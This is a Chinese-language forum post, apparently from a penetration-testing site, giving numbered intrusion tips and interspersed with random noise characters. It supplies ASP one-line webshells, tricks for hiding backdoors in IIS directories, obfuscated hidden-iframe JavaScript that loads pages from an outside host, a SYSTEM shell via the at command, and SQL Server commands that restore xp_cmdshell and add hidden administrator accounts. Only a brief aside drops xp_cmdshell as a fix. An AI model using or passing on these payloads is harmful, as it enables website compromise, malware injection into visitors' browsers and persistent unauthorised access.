  |- O7 y5 y1 F8 x- M4 i- o1 I51、log备份时的一句话木马:
5 e0 K+ P( s" R9 o4 }( Z' W9 S# n# ca).<%%25Execute(request("go"))%%25>
  O4 g' w9 f' o$ D9 Z* [* p; Wb).<%Execute(request("go"))%>9 U2 D) D% H5 R. ^( |9 ^
c).%><%execute request("go")%><%) b& X# f5 S" E/ ^$ s9 Z! I
d).<script language=VBScript runat=server>execute request("sb")</Script>5 R; H5 i  A0 S: L. o' w
e).<%25Execute(request("l"))%25>
; c* I$ \3 l0 \" L# xf).<%if request("cmd")<>"" then execute request("pass")%>; \- n0 }, B, O2 [

- W# }$ O+ e/ j0 o52、at "12:17" /interactive cmd0 ]( y, ]* }. Q1 _: M" J: ~
执行后可以用AT命令查看新加的任务7 i% ]3 [8 @# ^& n
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。3 u+ R3 B! j& i7 N: t6 K

2 p+ _7 L+ }! _  t53、隐藏ASP后门的两种方法
& N7 r6 {6 o, A7 ]6 K1、建立非标准目录:mkdir images..\. T4 a# @: X  G2 y! }- O+ _# f
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp. u9 d0 ]3 N# s. Y! S: N2 f$ I7 {7 _) d
通过web访问ASP木马:http://ip/images../news.asp?action=login  s0 ?# X0 |# P6 H$ H
如何删除非标准目录:rmdir images..\ /s
  ]7 z! ^5 l8 h/ b8 g! {) q2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:$ N& x' v: Z+ z+ x$ N; M* {
mkdir programme.asp
( A+ ^' @( ~$ [; e9 Q+ S新建1.txt文件内容:<!--#include file=”12.jpg”-->
) \. e: a9 O5 x/ t新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
8 h' u* g/ n) _attrib +H +S programme.asp) @! B0 R" ?( |: A
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
: H3 ~7 ~7 i; g" Q- F) {/ k, B  e# A0 A- b5 {; Z/ ~
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
- J* U; a  s7 y8 G* I3 F/ [然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。" [) o* O" `& n" k/ |7 g2 D
  y; W- N& w* [6 f3 h6 H
55、JS隐蔽挂马
0 T5 ^4 I8 X# Q6 M* Y7 ~& a1.1 O+ C. B  u- d3 q) r
var tr4c3="<iframe src=ht";
* ^% {6 t1 t4 T' G7 {) A# h8 E  @tr4c3 = tr4c3+"tp:/";: |8 e' x  G2 Y2 k
tr4c3 = tr4c3+"/ww";
( s% p, Z  ^# gtr4c3 = tr4c3+"w.tr4";" z* u' b- C; Y& T
tr4c3 = tr4c3+"c3.com/inc/m";. X# T1 `- d3 o
tr4c3 = tr4c3+"m.htm style="display:none"></i";
) F$ h# o# v) U7 t, w$ Atr4c3 =tr4c3+"frame>'";
* p" {/ O+ G) ]) |! kdocument.write(tr4c3);8 ]: _4 Z7 D2 q
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
9 X+ p+ t7 g0 u9 v. W$ G- ]# g) T* i
2.
( J6 W  N7 e) U( Q! w转换进制,然后用EVAL执行。如7 v( L$ }. ~7 n+ h6 n" a
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; l+ z% `1 [( r% ], b3 h
不过这个有点显眼。8 y9 d* U. P% u6 i
3./ L" p3 X8 z0 s: }" z
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
% g, i+ w- W+ X! P% ?最后一点,别忘了把文件的时间也修改下。
1 n4 I* U5 h# `" A
/ m5 }  P6 X4 C* G6 e56.3389终端入侵常用DOS命令  B2 R  i) O5 }& S' k
taskkill taskkill /PID 1248 /t
1 `7 \8 K9 l7 X7 b- L1 G& C1 j$ _* {0 R- N& t/ |9 g
tasklist 查进程
: a+ I0 O, @1 ~8 ?6 n* C5 c, n+ R. ?+ I6 y* R1 h$ t8 E% T, H' Q
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; s( E1 b9 o4 D7 |iisreset /reboot7 n% t) |! Q% T" T0 I
tsshutdn /reboot /delay:1    重起服务器
. B3 K# T% G8 K
; ~* ~% ^8 G' h" `" @" Hlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
. F& Q! h; R8 W+ i3 P- \& ]5 b  ?) }. B3 K
query user 查看当前终端用户在线情况" E) J( @$ }; \/ I8 T3 V
2 Y* u  `7 E& }
要显示有关所有会话使用的进程的信息,请键入:query process *
5 P& Q# J$ |1 U$ {/ |! K
  u6 e* ]( [" ?要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
9 l: |+ ?5 i4 R2 i
# H% n+ W# S% T' a要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2/ v: w7 `  G/ ~! N: ]6 ]8 {% l
3 X! R- }2 _- s- W' X4 c1 a2 n: f
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM025 i! J" X2 g9 z. X; V4 a6 z

- x" a) o+ j/ }% \' v1 [$ {" l! z; N命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
9 y; z$ }; z4 N2 k$ Y2 Z' x. i- g- O) G3 }! z( R, _3 [6 g$ X2 S
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
" J' D" n& |7 {. j6 Y% B$ o1 n# Y* G; w% n8 k& m( O
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
$ U' f7 {  t& m
5 L5 N- q1 u: f; B: f: N- x( b命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
, ], I  j% {9 e0 T; C3 ?) o2 w3 a, i2 F9 m
56、在地址栏或按Ctrl+O,输入:
4 B7 a: Q0 z: f+ z& Y' D  t0 X1 C8 Kjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
9 R0 b# [' v1 x( @( E2 Y& h, A4 v) K, |' K2 D' Y9 u! ]! m
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。& g0 E" u8 D2 D& E0 ]+ [4 S
5 F8 f6 e& P5 g0 `7 m
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
: E$ `* N6 a$ n' D用net localgroup administrators是可以看到管理组下,加了$的用户的。
7 q/ b* G, A3 I/ ^9 ]% J* c2 g- u" N. g. E
58、 sa弱口令相关命令
  r2 G% E6 M* v8 C$ a. [4 j9 R' _. t5 `5 O2 N
一.更改sa口令方法:) Z$ C* g/ g9 L2 G% H
用sql综合利用工具连接后,执行命令:
; d8 e! P# h# S% y+ c- n8 t; M0 cexec sp_password NULL,'20001001','sa'
8 i' A! U6 A5 g9 m& c$ V(提示:慎用!)
9 N. {5 s. t3 ]$ P; G; b/ a2 s  D& t4 s" W' T; l, `4 u$ ^, H
二.简单修补sa弱口令.) t; s- w5 |) y: [

1 p  ]  l7 {4 y$ I0 j0 d方法1:查询分离器连接后执行:0 o6 w! e5 P. e+ I9 _! O) {
if exists (select * from
: D. O, z2 N  w' O5 cdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
: K! w- \4 t( f  BOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
. o- D2 ~/ Q9 C
5 Y2 e2 N& u* O  n; O, fexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'+ \7 {: n; x6 N3 s0 z0 R
+ [' k; J1 q5 a+ D' ~* h
GO
# U& r! }5 d# M, i' _
' t, d" w" Z- ?" d, v9 S然后按F5键命令执行完毕9 N( s' H8 w9 b2 @7 T
7 }% |8 v$ D1 r( a2 n1 M
方法2:查询分离器连接后
" Q* s+ y6 x2 \第一步执行:use master
# {( _' {6 E0 y( y% d7 |% Y7 F第二步执行:sp_dropextendedproc 'xp_cmdshell'  Z( e6 p' [* R
然后按F5键命令执行完毕+ n1 y  j% ^8 r7 {: A

" W3 D1 c* G: {0 {& t/ \" r
5 `/ Z) N% Z  h7 k9 T三.常见情况恢复执行xp_cmdshell.
4 a! T0 s. b. E, l7 V4 `# H$ B. D5 R) U7 S
2 P' V) Q( t2 G& P; Y$ \- C
1 未能找到存储过程'master..xpcmdshell'.0 I* w6 B; ]& n  ?7 K! m: t) Y
   恢复方法:查询分离器连接后,# E% J0 ~5 G9 V9 H6 h" E4 g3 `
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
# Q1 T& F% D# C! K6 b. p4 I第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- x1 i  j0 ~+ N然后按F5键命令执行完毕7 H0 w* \% K0 O- s! @! l" o3 m! y: B

* U% ^$ {  Q! E" O+ `8 i2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
% o) _1 z  d% \, y; n2 W恢复方法:查询分离器连接后,  G9 x5 J, V( N
第一步执行:sp_dropextendedproc "xp_cmdshell"
0 {+ j& |9 c1 E第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# `  J3 G6 j5 o7 M1 J2 n然后按F5键命令执行完毕
; x8 e. O  p0 a7 A8 G, s) F* C5 y% D! w! f8 P& X: x( P0 C$ T! o' a9 }
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。). M; }4 H& v2 i0 `
恢复方法:查询分离器连接后,
) L* `- T" k& U6 n第一步执行:exec sp_dropextendedproc 'xp_cmdshell'- U5 t- C  E& |; p
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           . T7 \: N' Z" M: N$ }2 H
然后按F5键命令执行完毕
' T; u/ g5 G0 B9 v* i
+ H' W% F5 a6 E四.终极方法.( X. \( X6 w' ~' Q- t- V
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:6 J! K. j9 h# x( s  a0 z( E
查询分离器连接后,( A/ |7 U, z1 g$ n8 z
2000servser系统:
: \( e! R" J$ n2 t& N0 ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add', Q+ Q8 ?8 U9 q: B

! S3 B0 W4 `1 O: fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'( Y* B) u2 c4 g% L9 n' `
' c+ P. g) B$ G6 p7 f
xp或2003server系统:. i- }3 v; o7 ^
( j% t8 N" q0 ?4 {2 h6 V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'1 e# c7 @: g2 {) J  q9 {2 g# h
* o) q& X7 E$ X9 k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'% y; V8 @4 S/ K& L





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2